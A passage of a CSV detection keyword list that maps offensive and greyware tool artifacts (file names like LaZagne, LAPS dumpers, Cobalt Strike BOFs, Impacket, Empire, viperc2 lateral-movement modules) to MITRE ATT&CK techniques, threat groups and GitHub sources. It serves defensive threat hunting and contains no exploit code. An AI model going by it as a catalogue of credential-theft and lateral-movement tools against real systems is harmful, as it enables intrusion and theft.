T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*LapsAllowedAdminGroups.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*LAPSDecrypt.*,offensive_tool_keyword,LAPSDecrypt,Quick POC looking at how encryption works for LAPS (v2),T1552.004,TA0003,N/A,N/A,Credential Access,https://gist.github.com/xpn/23dc5b6c260a7571763ca8ca745c32f4,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Lapsdump.cna*,offensive_tool_keyword,C2-Tool-Collection,A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques,T1055 - T1218 - T1059 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/outflanknl/C2-Tool-Collection,1,1,N/A,10,10,885,152,2023-05-03T19:35:38Z,2022-04-22T13:43:35Z -*Lapsdump.exe*,offensive_tool_keyword,C2-Tool-Collection,A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques,T1055 - T1218 - T1059 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/outflanknl/C2-Tool-Collection,1,1,N/A,10,10,885,152,2023-05-03T19:35:38Z,2022-04-22T13:43:35Z -*LAPSDumper-main*,offensive_tool_keyword,LAPSDumper,Dumping LAPS from Python,T1136.001 - T1112 - T1078.001,TA0002 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/n00py/LAPSDumper,1,1,N/A,10,3,222,34,2022-12-07T18:35:28Z,2020-12-19T05:15:10Z -*LapsPasswords.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*LAPSToolkit*,offensive_tool_keyword,LAPSToolkit,Functions written in PowerShell that leverage PowerView to audit and attack Active Directory environments that have deployed Microsofts Local Administrator Password Solution (LAPS). It includes finding groups specifically delegated by sysadmins. finding users with All Extended Rights that can view passwords. and viewing all computers with LAPS enabled,T1087.001 - T1069 - T1069.003 - T1069.007 - T1069.002 - T1069.001,TA0007 - TA0008 - TA0009,N/A,N/A,Information Gathering,https://github.com/leoloobeek/LAPSToolkit,1,1,N/A,N/A,7,659,108,2018-01-31T14:45:35Z,2016-04-27T00:06:20Z -*LaresLLC/SlinkyCat*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,1,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*LasCC/Hack-Tools*,offensive_tool_keyword,hack-tools,The all-in-one Red Team browser extension for Web Pentester,T1059.007 - T1505 - T1068 - T1216 - T1547.009,TA0002 - TA0001 - TA0009,N/A,N/A,Web Attacks,https://github.com/LasCC/Hack-Tools,1,1,N/A,9,10,5006,586,2023-10-03T15:40:37Z,2020-06-22T21:42:16Z -*lastpass.x86*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*lastpass/process_lp_files.py*,offensive_tool_keyword,cobaltstrike,Cobaltstrike Bofs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*lastpass_sniffed_fmt_plug*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*lastpass2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*Lateral/DCom.cs*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*Lateral/PSExec.cs*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*Lateral/SMBClient.cs*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*Lateral/SMBClientDelete.cs*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*Lateral/SMBClientGet.cs*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*Lateral/SMBClientPut.cs*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*Lateral/WMIExec.cs*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*lateral_wmi.py*,offensive_tool_keyword,SharPyShell,SharPyShell - tiny and obfuscated ASP.NET webshell for C# web,T1100 - T1059 - T1505,TA0002 - TA0003 - TA0004,N/A,N/A,Web Attacks,https://github.com/antonioCoco/SharPyShell,1,1,N/A,N/A,9,809,144,2023-09-27T08:48:31Z,2019-03-10T22:09:40Z -*LateralMovement_*_Exploit*.py,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*LateralMovement_ExploitationOfRemoteServices_AuxiliaryMs17010.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*LateralMovement_ExploitationOfRemoteServices_MS17010.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*LateralMovement_Other_Ladon.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*LateralMovement_PassTheHash_ByInvokeWMIExec.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*LateralMovement_PassTheHash_ByWmi.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*LateralMovement_PassTheTicket_ByPsexec.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*LateralMovement_PassTheTicket_BySharpwmi.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*LateralMovement_PassTheTicket_ByWmi.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Launch Empire CLI*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*Launch Empire Server*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*LaunchExploitMode.ps1*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*LAUNCHING GPODDITY SMB SERVER AND WAITING FOR GPO REQUESTS*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*LaunchPreCompromise.ps1*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*layer8secure/SilentHound*,offensive_tool_keyword,SilentHound,Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/layer8secure/SilentHound,1,1,N/A,N/A,5,430,44,2023-01-23T20:41:55Z,2022-07-01T13:49:24Z -*Lazagne*Passwords.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*laZagne.exe browsers*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,0,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -*Lazagne.exe*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,1,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -*laZagne.exe*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z -*Lazagne.py*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,1,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -*LaZagneForensic*,offensive_tool_keyword,LaZagneForensic,Windows passwords decryption from dump files,T1003 - T1081 - T1082,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagneForensic,1,1,N/A,N/A,5,450,114,2023-02-02T16:36:21Z,2018-02-01T15:44:31Z -*LaZagne-master.zip*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,1,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -*lazynmap.sh*,offensive_tool_keyword,LALIN,this script automatically install any package for pentest with uptodate tools . and lazy command for run the tools like lazynmap . install another and update to new,T1588,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/LALIN,1,1,N/A,N/A,4,350,164,2017-04-13T13:47:21Z,2016-06-10T07:53:49Z -*lazypariah *,offensive_tool_keyword,LAZYPARIAH,LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly,T1059 - T1566 - T1212 - T1574,TA0002 - TA0003 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/octetsplicer/LAZYPARIAH,1,0,N/A,N/A,2,136,30,2022-06-18T08:59:45Z,2020-11-20T05:08:36Z -*lazypariah.svg*,offensive_tool_keyword,LAZYPARIAH,LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly,T1059 - T1566 - T1212 - T1574,TA0002 - TA0003 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/octetsplicer/LAZYPARIAH,1,1,N/A,N/A,2,136,30,2022-06-18T08:59:45Z,2020-11-20T05:08:36Z -*lcmammnjlbmlbcaniggmlejfjpjagiia*,greyware_tool_keyword,Adblock Office VPN Proxy Server,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*ldap_enums.go*,offensive_tool_keyword,adalanche,Active Directory ACL Visualizer and Explorer - who's really Domain Admin?,T1484 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/lkarlslund/Adalanche,1,1,N/A,N/A,10,1202,119,2023-06-20T13:02:30Z,2020-10-07T10:07:22Z -*ldap_shell.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*ldapasn1.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*ldapattack.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*ldapattack.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - 